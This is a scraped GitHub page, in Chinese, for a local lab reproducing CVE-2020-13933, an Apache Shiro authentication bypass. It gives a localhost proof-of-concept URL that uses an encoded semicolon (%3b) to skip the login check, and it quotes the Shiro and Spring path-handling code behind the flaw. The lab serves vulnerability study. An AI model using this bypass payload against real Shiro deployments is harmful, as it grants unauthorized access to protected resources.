CVE-2020-13933 靶场

shiro < 1.6.0 身份认证绕过漏洞

PoC

http://127.0.0.1:8080/res/%3bpoc

靶场环境

代码说明

ShiroConfig.java：
　　权限配置，当请求 /res/* 资源时， 302 跳转到登陆页面进行身份认证
NameController.java：
　　· /res/{name}：请求名为 name 的的资源（触发身份认证）
　　· /res/：不请求任何资源（不触发身份认证）

靶场验证

不在请求路由中指定资源名称时，不触发身份验证，也无资源返回： http://127.0.0.1:8080/res/

在请求路由中指定资源名称时，302 跳转到身份验证页面： http://127.0.0.1:8080/res/poc

构造特定 PoC 请求指定资源时，不触发身份验证，并返回资源： http://127.0.0.1:8080/res/%3bpoc （%3b 是 ; 的 URL 编码）

漏洞 DEBUG 位置

shiro-web-1.5.3.jar

// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}

spring-web-5.2.5.RELEASE.jar

// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}

Name		Name	Last commit message	Last commit date
Latest commit History 20 Commits
.github		.github
imgs		imgs
src		src
.gitignore		.gitignore
README.md		README.md
pom.xml		pom.xml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2020-13933 靶场

PoC

靶场环境

代码说明

靶场验证

漏洞 DEBUG 位置

shiro-web-1.5.3.jar

spring-web-5.2.5.RELEASE.jar

About

Releases

Sponsor this project

Packages

Languages

EXP-Docs/CVE-2020-13933

Folders and files

Latest commit

History

Repository files navigation

CVE-2020-13933 靶场

PoC

靶场环境

代码说明

靶场验证

漏洞 DEBUG 位置

shiro-web-1.5.3.jar

spring-web-5.2.5.RELEASE.jar

About

Topics

Resources

Stars

Watchers

Forks

Releases

Sponsor this project

Packages 0

Languages

Packages